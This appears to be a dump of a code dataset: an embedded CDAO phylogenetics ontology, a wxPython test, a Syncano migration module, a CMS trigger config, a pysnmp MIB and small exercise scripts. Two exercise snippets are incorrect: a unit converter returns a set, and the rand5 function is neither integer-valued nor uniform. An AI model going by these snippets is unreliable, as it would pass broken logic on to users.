<!-- http://purl.obolibrary.org/obo/CDAO_0000112 -->
<owl:Class rdf:about="&obo;CDAO_0000112">
<rdfs:label rdf:datatype="&xsd;string">AminoAcidResidueStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000050"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000113 -->
<owl:Class rdf:about="&obo;CDAO_0000113">
<rdfs:label rdf:datatype="&xsd;string">PHYLIPDataMatrix</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000107"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000114 -->
<owl:Class rdf:about="&obo;CDAO_0000114">
<rdfs:label rdf:datatype="&xsd;string">ContinuousCharLikelihoodLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000009"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000115 -->
<owl:Class rdf:about="&obo;CDAO_0000115">
<rdfs:label rdf:datatype="&xsd;string">MolecularCharacter</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000111"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000116 -->
<owl:Class rdf:about="&obo;CDAO_0000116">
<rdfs:label rdf:datatype="&xsd;string">hereditaryPersistance</rdfs:label>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000190"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000097"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000117 -->
<owl:Class rdf:about="&obo;CDAO_0000117">
<rdfs:label rdf:datatype="&xsd;string">SetOfCharacters</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000118"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000118 -->
<owl:Class rdf:about="&obo;CDAO_0000118">
<rdfs:label rdf:datatype="&xsd;string">SetOfThings</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000198"/>
<owl:allValuesFrom>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000071"/>
<rdf:Description rdf:about="&obo;CDAO_0000117"/>
</owl:unionOf>
</owl:Class>
</owl:allValuesFrom>
</owl:Restriction>
</rdfs:subClassOf>
<dc:description>The class is used to describe either colletions of characters or higher order grouping (e.g., groups of groups of characters). This extends the CharSet block of NEXUS.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000120 -->
<owl:Class rdf:about="&obo;CDAO_0000120">
<rdfs:label rdf:datatype="&xsd;string">Sequence</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000178"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000098"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000178"/>
<owl:allValuesFrom>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000151"/>
<owl:onClass rdf:resource="&obo;CDAO_0000022"/>
<owl:minQualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:minQualifiedCardinality>
</owl:Restriction>
</owl:allValuesFrom>
</owl:Restriction>
</rdfs:subClassOf>
<dc:description>A set of ordered states, typically the residues in a macromolecular sequence.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000121 -->
<owl:Class rdf:about="&obo;CDAO_0000121">
<rdfs:label rdf:datatype="&xsd;string">speciation</rdfs:label>
<owl:equivalentClass rdf:resource="&obo;CDAO_0000122"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000064"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000122 -->
<owl:Class rdf:about="&obo;CDAO_0000122">
<rdfs:label rdf:datatype="&xsd;string">cladogenesis</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000064"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000124 -->
<owl:Class rdf:about="&obo;CDAO_0000124">
<rdfs:label rdf:datatype="&xsd;string">Bifurcation</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000026"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000177"/>
<owl:cardinality rdf:datatype="&xsd;nonNegativeInteger">2</owl:cardinality>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000125 -->
<owl:Class rdf:about="&obo;CDAO_0000125">
<rdfs:label rdf:datatype="&xsd;string">DiscreteCharBayesianLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000100"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000126 -->
<owl:Class rdf:about="&obo;CDAO_0000126">
<rdfs:label rdf:datatype="&xsd;string">TaxonomicLink</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000066"/>
<dc:description>Link to an externally defined taxonomic hierarchy.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000127 -->
<owl:Class rdf:about="&obo;CDAO_0000127">
<rdfs:label rdf:datatype="&xsd;string">MonophyleticGroup</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000006"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000128 -->
<owl:Class rdf:about="&obo;CDAO_0000128">
<rdfs:label rdf:datatype="&xsd;string">molecularRecombination</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000132"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000129 -->
<owl:Class rdf:about="&obo;CDAO_0000129">
<rdfs:label rdf:datatype="&xsd;string">HolophyleticGroup</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000127"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000130 -->
<owl:Class rdf:about="&obo;CDAO_0000130">
<rdfs:label rdf:datatype="&xsd;string">FullyResolvedTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000131 -->
<owl:Class rdf:about="&obo;CDAO_0000131">
<rdfs:label rdf:datatype="&xsd;string">AminoAcidResidueCharacter</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000115"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000168"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000112"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000153"/>
<owl:allValuesFrom rdf:resource="&obo;CDAO_0000112"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000132 -->
<owl:Class rdf:about="&obo;CDAO_0000132">
<rdfs:label rdf:datatype="&xsd;string">recombination</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000087"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000133 -->
<owl:Class rdf:about="&obo;CDAO_0000133">
<rdfs:label rdf:datatype="&xsd;string">DesoxiRibonucleotideResidue</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000034"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000134 -->
<owl:Class rdf:about="&obo;CDAO_0000134">
<rdfs:label rdf:datatype="&xsd;string">RootedSubtree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000012"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000070"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000136 -->
<owl:Class rdf:about="&obo;CDAO_0000136">
<rdfs:label rdf:datatype="&xsd;string">CompoundStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000089"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000137 -->
<owl:Class rdf:about="&obo;CDAO_0000137">
<rdfs:label rdf:datatype="&xsd;string">GapCost</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000007"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000138 -->
<owl:Class rdf:about="&obo;CDAO_0000138">
<rdfs:label rdf:datatype="&xsd;string">TU</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<dc:description>A unit of analysis that may be tied to a node in a tree and to a row in a character matrix. It subsumes the traditional concepts of 'OTU' and 'HTU'.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000139 -->
<owl:Class rdf:about="&obo;CDAO_0000139">
<rdfs:label rdf:datatype="&xsd;string">DirectedEdge</rdfs:label>
<owl:equivalentClass>
<owl:Class>
<owl:intersectionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000099"/>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000201"/>
<owl:onClass rdf:resource="&obo;CDAO_0000140"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000209"/>
<owl:onClass rdf:resource="&obo;CDAO_0000140"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</owl:intersectionOf>
</owl:Class>
</owl:equivalentClass>
<dc:description>A directed edge. Rooted trees have directed edges. The direction is specified by way of the parent and child relationships of nodes that the edge connects.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000140 -->
<owl:Class rdf:about="&obo;CDAO_0000140">
<rdfs:label rdf:datatype="&xsd;string">Node</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000143"/>
<owl:onClass rdf:resource="&obo;CDAO_0000139"/>
<owl:maxQualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:maxQualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000194"/>
<owl:onClass rdf:resource="&obo;CDAO_0000006"/>
<owl:minQualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:minQualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000141 -->
<owl:Class rdf:about="&obo;CDAO_0000141">
<rdfs:label rdf:datatype="&xsd;string">ContinuousCharDistanceLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000009"/>
</owl:Class>
<!--
///////////////////////////////////////////////////////////////////////////////////////
//
// Individuals
//
///////////////////////////////////////////////////////////////////////////////////////
-->
<!-- http://purl.obolibrary.org/obo/CDAO_0000220 -->
<owl:Thing rdf:about="&obo;CDAO_0000220">
<rdf:type rdf:resource="&obo;CDAO_0000133"/>
<rdf:type rdf:resource="&owl;NamedIndividual"/>
<rdfs:label rdf:datatype="&xsd;string">dA</rdfs:label>
</owl:Thing>
<!-- http://purl.obolibrary.org/obo/CDAO_0000221 -->
<owl:Thing rdf:about="&obo;CDAO_0000221">
<rdf:type rdf:resource="&obo;CDAO_0000015"/>
<rdf:type rdf:resource="&owl;NamedIndividual"/>
<rdfs:label rdf:datatype="&xsd;string">absent</rdfs:label>
</owl:Thing>
<!-- http://purl.obolibrary.org/obo/CDAO_0000222 -->
<owl:Thing rdf:about="&obo;CDAO_0000222">
<rdf:type rdf:resource="&obo;CDAO_0000015"/>
<rdf:type rdf:resource="&owl;NamedIndividual"/>
<rdfs:label rdf:datatype="&xsd;string">unknown</rdfs:label>
</owl:Thing>
<!-- http://purl.obolibrary.org/obo/CDAO_0000223 -->
<owl:Thing rdf:about="&obo;CDAO_0000223">
<rdf:type rdf:resource="&obo;CDAO_0000015"/>
<rdf:type rdf:resource="&owl;NamedIndividual"/>
<rdfs:label rdf:datatype="&xsd;string">gap</rdfs:label>
</owl:Thing>
<!-- http://purl.obolibrary.org/obo/CDAO_0000224 -->
<owl:Thing rdf:about="&obo;CDAO_0000224">
<rdf:type rdf:resource="&obo;CDAO_0000133"/>
<rdf:type rdf:resource="&owl;NamedIndividual"/>
<rdfs:label rdf:datatype="&xsd;string">dG</rdfs:label>
</owl:Thing>
<!-- http://purl.obolibrary.org/obo/CDAO_0000225 -->
<owl:Thing rdf:about="&obo;CDAO_0000225">
<rdf:type rdf:resource="&obo;CDAO_0000057"/>
<rdf:type rdf:resource="&owl;NamedIndividual"/>
<rdfs:label rdf:datatype="&xsd;string">rU</rdfs:label>
</owl:Thing>
<!-- http://purl.obolibrary.org/obo/CDAO_0000226 -->
<owl:Thing rdf:about="&obo;CDAO_0000226">
<rdf:type rdf:resource="&obo;CDAO_0000133"/>
<rdf:type rdf:resource="&owl;NamedIndividual"/>
<rdfs:label rdf:datatype="&xsd;string">dC</rdfs:label>
</owl:Thing>
<!-- http://purl.obolibrary.org/obo/CDAO_0000227 -->
<owl:Thing rdf:about="&obo;CDAO_0000227">
<rdf:type rdf:resource="&obo;CDAO_0000133"/>
<rdf:type rdf:resource="&owl;NamedIndividual"/>
<rdfs:label rdf:datatype="&xsd;string">dT</rdfs:label>
</owl:Thing>
<!--
///////////////////////////////////////////////////////////////////////////////////////
//
// General axioms
//
///////////////////////////////////////////////////////////////////////////////////////
-->
<rdf:Description>
<rdf:type rdf:resource="&owl;AllDisjointClasses"/>
<owl:members rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000068"/>
<rdf:Description rdf:about="&obo;CDAO_0000094"/>
<rdf:Description rdf:about="&obo;CDAO_0000131"/>
</owl:members>
</rdf:Description>
<rdf:Description>
<rdf:type rdf:resource="&owl;AllDisjointClasses"/>
<owl:members rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000002"/>
<rdf:Description rdf:about="&obo;CDAO_0000019"/>
<rdf:Description rdf:about="&obo;CDAO_0000112"/>
</owl:members>
</rdf:Description>
</rdf:RDF>
<!-- Generated by the OWL API (version 3.2.3.1824) http://owlapi.sourceforge.net -->
'''
cdao_elements = {}
root = ET.fromstring(cdao_owl)
for node_type in 'ObjectProperty', 'Class', 'DatatypeProperty':
for element in root.findall('{http://www.w3.org/2002/07/owl#}%s' % node_type):
obo = element.attrib[
'{http://www.w3.org/1999/02/22-rdf-syntax-ns#}about'].split('/')[-1]
cdao = element.find(
'{http://www.w3.org/2000/01/rdf-schema#}label').text
cdao_elements[cdao] = obo
| [
"Viktoria@MacBook-Pro-Viktoria.local"
] | Viktoria@MacBook-Pro-Viktoria.local |
bc3039b702b60de2ad0b98c5e1f7c1c29194a51e | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_320/ch10_2019_08_27_16_35_02_989821.py | 522518cfaa6f96c8fbc53cce1d65b27c346ae1ab | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 94 | py | def libras_para_kg(peso):
kg = float(peso) / 2.205
kg = round(kg, 7)
return {kg}
| [
"you@example.com"
] | you@example.com |
b7a6a233b4f0339a1ebc06963cccc30764639268 | ea05617b5d33a641bb60b735e936e8f0ba6e57a7 | /unittests/test_lib_stattext.py | 2b9e4c91a84a74c6add8c63e390d40262a79fe63 | [] | no_license | bbpatil/Phoenix | 18716744f5a3f5dbd805520baf3edc14ebde9529 | 4d05434a6c9e9effb2ade8085e2bfa83775575ed | refs/heads/master | 2022-02-23T21:40:34.510672 | 2016-06-12T05:26:06 | 2016-06-12T05:26:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 835 | py | import unittest
import wtc
import wx
import wx.lib.stattext
#---------------------------------------------------------------------------
class lib_stattext_Tests(wtc.WidgetTestCase):
def test_lib_stattext1(self):
pnl = wx.Panel(self.frame)
w = wx.lib.stattext.GenStaticText(pnl, label="This is a test", pos=(10,10))
bs1 = w.GetEffectiveMinSize()
w.SetLabel("This is a New Label")
w.SetFont(wx.FFont(16, wx.FONTFAMILY_ROMAN))
bs2 = w.GetEffectiveMinSize()
self.assertEqual(w.GetLabel(), "This is a New Label")
self.assertEqual(w.Label, "This is a New Label")
self.assertTrue(bs2.height > bs1.height)
#---------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
| [
"robin@alldunn.com"
] | robin@alldunn.com |
82aa33b02948617205755e82c678811a99b89edf | 1637440d91025bcbccee1703841362ac37ea5176 | /syncano_cli/parse_to_syncano/migrations/relation.py | 55c4b8fc867a2a2f3a332e6a7e16fb0c4eb680bb | [
"MIT"
] | permissive | dhruveshsheladiya/syncano-cli | 3c440b8861f1e88c08f7d91f52d891128d975ad3 | 5ca110cd3aef3ed51b2ad72c1b8a5a83efa3dce6 | refs/heads/master | 2020-03-24T01:16:26.502638 | 2016-09-27T19:18:05 | 2016-09-27T19:18:05 | 142,328,999 | 0 | 0 | null | 2018-07-25T16:54:33 | 2018-07-25T16:54:33 | null | UTF-8 | Python | false | false | 4,111 | py | # -*- coding: utf-8 -*-
import six
from syncano.models import Object
from syncano_cli.parse_to_syncano.config import PARSE_PAGINATION_LIMIT
from syncano_cli.parse_to_syncano.migrations.aggregation import data_aggregate
from syncano_cli.parse_to_syncano.migrations.mixins import PaginationMixin, ParseConnectionMixin
from syncano_cli.parse_to_syncano.processors.klass import ClassProcessor
class ClassRelationProcessor(ParseConnectionMixin, PaginationMixin):
def __init__(self, class_name, relations, config):
self.class_name = class_name
self.relations = relations
self.reference_map = data_aggregate.reference_map
self.config = config
def process_class(self, instance):
for relation in self.relations:
for field_name, relation_meta in six.iteritems(relation):
target_name = relation_meta['targetClass']
self._find_and_update_relations_objects(
field_name=field_name,
target_name=target_name,
instance=instance
)
def _find_and_update_relations_objects(self, field_name, target_name, instance):
# get the parse classes now;
for parse_class_name, objects_id_map in six.iteritems(self.reference_map):
if self.class_name == ClassProcessor.normalize_class_name(parse_class_name):
for parse_id, syncano_id in six.iteritems(objects_id_map):
self._find_relations_for_object(
parse_class_name=parse_class_name,
target_name=target_name,
parse_id=parse_id,
syncano_id=syncano_id,
field_name=field_name,
instance=instance
)
def _find_relations_for_object(self, parse_class_name, target_name, parse_id, syncano_id, field_name, instance):
limit, skip = self.get_limit_and_skip()
while True:
objects = self._find_parse_objects(parse_class_name, parse_id, field_name,
target_name, limit, skip)
if not objects['results']:
break
limit += PARSE_PAGINATION_LIMIT
skip += PARSE_PAGINATION_LIMIT
self._update_syncano_object(
field_name=field_name,
target_name=target_name,
objects_results=objects['results'],
syncano_id=syncano_id,
instance=instance
)
def _find_parse_objects(self, parse_class_name, parse_id, field_name, target_name, limit, skip):
query = {
"$relatedTo": {
"object": {
"__type": "Pointer",
"className": parse_class_name,
"objectId": parse_id},
"key": field_name}
}
return self.parse.get_class_objects(target_name, limit=limit, skip=skip, query=query)
def _update_syncano_object(self, field_name, target_name, objects_results, syncano_id, instance):
Object.please.update(
**{
field_name: {
"_add": [
self.reference_map[target_name][
data_object['objectId']
] for data_object in objects_results]
},
"class_name": self.class_name,
"id": syncano_id,
"instance_name": instance.name
}
)
class RelationProcessor(object):
def __init__(self, class_name, class_relations, *args, **kwargs):
super(RelationProcessor, self).__init__(*args, **kwargs)
self.class_relations = class_relations
self.class_name = class_name
def process(self, instance, config):
class_relation_processor = ClassRelationProcessor(
class_name=self.class_name,
relations=self.class_relations,
config=config
)
class_relation_processor.process_class(instance)
| [
"opalczynski@gmail.com"
] | opalczynski@gmail.com |
4b53d1aff74b9ca1c7a958b676fafc0af6f30f2e | 8e0a7d3f10a10942158cf3f95fd2e81e92d37843 | /test_twisted_async_response/concurrent_client.py | c0b76423fc79be5e9f2a53fcc5f32786ca933f33 | [] | no_license | xsren/python_test_demo | 1d528cb8ebe017d962a2b155638e233c094b1e63 | d320276bc9f6fb80860d8db7fcd3f500865176b3 | refs/heads/master | 2020-12-30T17:50:43.830322 | 2017-08-01T03:35:45 | 2017-08-01T03:35:45 | 82,634,652 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 349 | py | # coding:utf8
import requests
import threading
def run():
print requests.get('http://127.0.0.1:1234/crawler')
def main():
t_list = []
for i in xrange(30):
t_list.append(threading.Thread(target=run, args=()))
for t in t_list:
t.start()
for t in t_list:
t.join()
if __name__ == '__main__':
main()
| [
"bestrenxs@gmail.com"
] | bestrenxs@gmail.com |
b311e6d7b6d1e81c08bb8cc84850ffd001b69295 | 2455062787d67535da8be051ac5e361a097cf66f | /Producers/BSUB/TrigProd_amumu_a5_dR5/trigger_amumu_producer_cfg_TrigProd_amumu_a5_dR5_372.py | 3fbb1b489f893e31fa92395685530a11c8ff0448 | [] | no_license | kmtos/BBA-RecoLevel | 6e153c08d5ef579a42800f6c11995ee55eb54846 | 367adaa745fbdb43e875e5ce837c613d288738ab | refs/heads/master | 2021-01-10T08:33:45.509687 | 2015-12-04T09:20:14 | 2015-12-04T09:20:14 | 43,355,189 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,360 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("PAT")
#process.load("BBA/Analyzer/bbaanalyzer_cfi")
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.load('Configuration.EventContent.EventContent_cff')
process.load("Configuration.Geometry.GeometryRecoDB_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load("PhysicsTools.PatAlgos.producersLayer1.patCandidates_cff")
process.load("PhysicsTools.PatAlgos.selectionLayer1.selectedPatCandidates_cff")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'MCRUN2_71_V1::All', '')
process.load("Configuration.StandardSequences.MagneticField_cff")
####################
# Message Logger
####################
process.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(100)
process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
## switch to uncheduled mode
process.options.allowUnscheduled = cms.untracked.bool(True)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(500)
)
####################
# Input File List
####################
# Input source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('root://eoscms//eos/cms/store/user/ktos/RECO_Step3_amumu_a5/RECO_Step3_amumu_a5_372.root'),
secondaryFileNames = cms.untracked.vstring()
)
############################################################
# Defining matching in DeltaR, sorting by best DeltaR
############################################################
process.mOniaTrigMatch = cms.EDProducer("PATTriggerMatcherDRLessByR",
src = cms.InputTag( 'slimmedMuons' ),
matched = cms.InputTag( 'patTrigger' ), # selections of trigger objects
matchedCuts = cms.string( 'type( "TriggerMuon" ) && path( "HLT_Mu16_TkMu0_dEta18_Onia*")' ), # input does not yet have the 'saveTags' parameter in HLT
maxDPtRel = cms.double( 0.5 ), # no effect here
maxDeltaR = cms.double( 0.3 ), #### selection of matches
maxDeltaEta = cms.double( 0.2 ), # no effect here
resolveAmbiguities = cms.bool( True ),# definition of matcher output
resolveByMatchQuality = cms.bool( True )# definition of matcher output
)
# talk to output module
process.out = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string("file:RECO_Step3_amumu_a5_TrigProd_372.root"),
outputCommands = process.MINIAODSIMEventContent.outputCommands
)
process.out.outputCommands += [ 'drop *_*_*_*',
'keep *_*slimmed*_*_*',
'keep *_pfTausEI_*_*',
'keep *_hpsPFTauProducer_*_*',
'keep *_hltTriggerSummaryAOD_*_*',
'keep *_TriggerResults_*_HLT',
'keep *_patTrigger*_*_*',
'keep *_prunedGenParticles_*_*',
'keep *_mOniaTrigMatch_*_*'
]
################################################################################
# Running the matching and setting the the trigger on
################################################################################
from PhysicsTools.PatAlgos.tools.trigTools import *
switchOnTrigger( process ) # This is optional and can be omitted.
switchOnTriggerMatching( process, triggerMatchers = [ 'mOniaTrigMatch'
])
process.outpath = cms.EndPath(process.out)
| [
"kmtos@ucdavis.edu"
] | kmtos@ucdavis.edu |
82dac60d0ffe68054b0a7335cbf480b129ea8419 | 165a9d0db328e96d14ac7c3073205819768959e2 | /CDS_71_rand5_of_rand7.py | 4f2fde50f5a26969c74f7a83091584b94c28fade | [
"MIT"
] | permissive | celelstine/codingProblemSolutions | 12cef3396be96509bb37505fa357391537a8ad72 | 52e567aaa4a6e40c11bc131c2fdfffccfa7408b1 | refs/heads/master | 2021-06-05T21:15:29.772534 | 2020-02-23T18:19:29 | 2020-02-23T18:19:29 | 146,922,897 | 0 | 0 | MIT | 2018-10-01T05:32:59 | 2018-08-31T17:28:03 | JavaScript | UTF-8 | Python | false | false | 445 | py | import random
def rand7():
return random.randint(1,7)
def rand5():
problemDescription = '''
*problemDescription* \n
This problem was asked by Two Sigma.
Using a function rand7() that returns an integer from 1 to 7 (inclusive)
with uniform probability, implement a function rand5() that returns an
integer from 1 to 5 (inclusive).
'''
print(problemDescription)
return (rand7() * 5) /7
print(rand5())
| [
"okorocelestine@gmail.com"
] | okorocelestine@gmail.com |
41ea32d94d3a6051a0d9da368d6845f1dd0bca17 | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp/ChrComPmOpticsOMS-SRC-Interval-MIB.py | 5402d87dcd40317e45e7a4f24fc7e5a0faecf34e | [
"Apache-2.0"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 5,733 | py | #
# PySNMP MIB module ChrComPmOpticsOMS-SRC-Interval-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ChrComPmOpticsOMS-SRC-Interval-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 18:20:16 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint")
chrComIfifIndex, = mibBuilder.importSymbols("ChrComIfifTable-MIB", "chrComIfifIndex")
TruthValue, = mibBuilder.importSymbols("ChrTyp-MIB", "TruthValue")
chrComPmOptics, = mibBuilder.importSymbols("Chromatis-MIB", "chrComPmOptics")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
IpAddress, NotificationType, Unsigned32, MibIdentifier, ObjectIdentity, Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, TimeTicks, Bits, Counter32, iso, ModuleIdentity, Counter64 = mibBuilder.importSymbols("SNMPv2-SMI", "IpAddress", "NotificationType", "Unsigned32", "MibIdentifier", "ObjectIdentity", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "TimeTicks", "Bits", "Counter32", "iso", "ModuleIdentity", "Counter64")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
chrComPmOpticsOMS_SRC_IntervalTable = MibTable((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11), ).setLabel("chrComPmOpticsOMS-SRC-IntervalTable")
if mibBuilder.loadTexts: chrComPmOpticsOMS_SRC_IntervalTable.setStatus('current')
chrComPmOpticsOMS_SRC_IntervalEntry = MibTableRow((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1), ).setLabel("chrComPmOpticsOMS-SRC-IntervalEntry").setIndexNames((0, "ChrComIfifTable-MIB", "chrComIfifIndex"), (0, "ChrComPmOpticsOMS-SRC-Interval-MIB", "chrComPmOpticsIntervalNumber"))
if mibBuilder.loadTexts: chrComPmOpticsOMS_SRC_IntervalEntry.setStatus('current')
chrComPmOpticsIntervalNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsIntervalNumber.setStatus('current')
chrComPmOpticsSuspectedIntrvl = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 2), TruthValue()).setMaxAccess("readonly")
